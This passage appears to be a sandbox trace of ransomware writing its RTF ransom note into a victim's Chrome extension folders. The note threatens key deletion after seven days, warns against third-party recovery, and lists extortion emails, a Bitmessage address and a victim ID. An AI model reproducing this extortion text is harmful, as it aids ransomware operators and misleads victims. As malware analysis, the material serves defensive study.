s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.747] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n=typeof b)return b;try{\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0283.747] WriteFile (in: hFile=0x2cc, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.748] CloseHandle (hObject=0x2cc) returned 1 [0283.748] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\#readme_eman#.rtf")) returned 0xffffffff [0283.748] GetLastError () returned 0x2 [0283.748] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.749] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 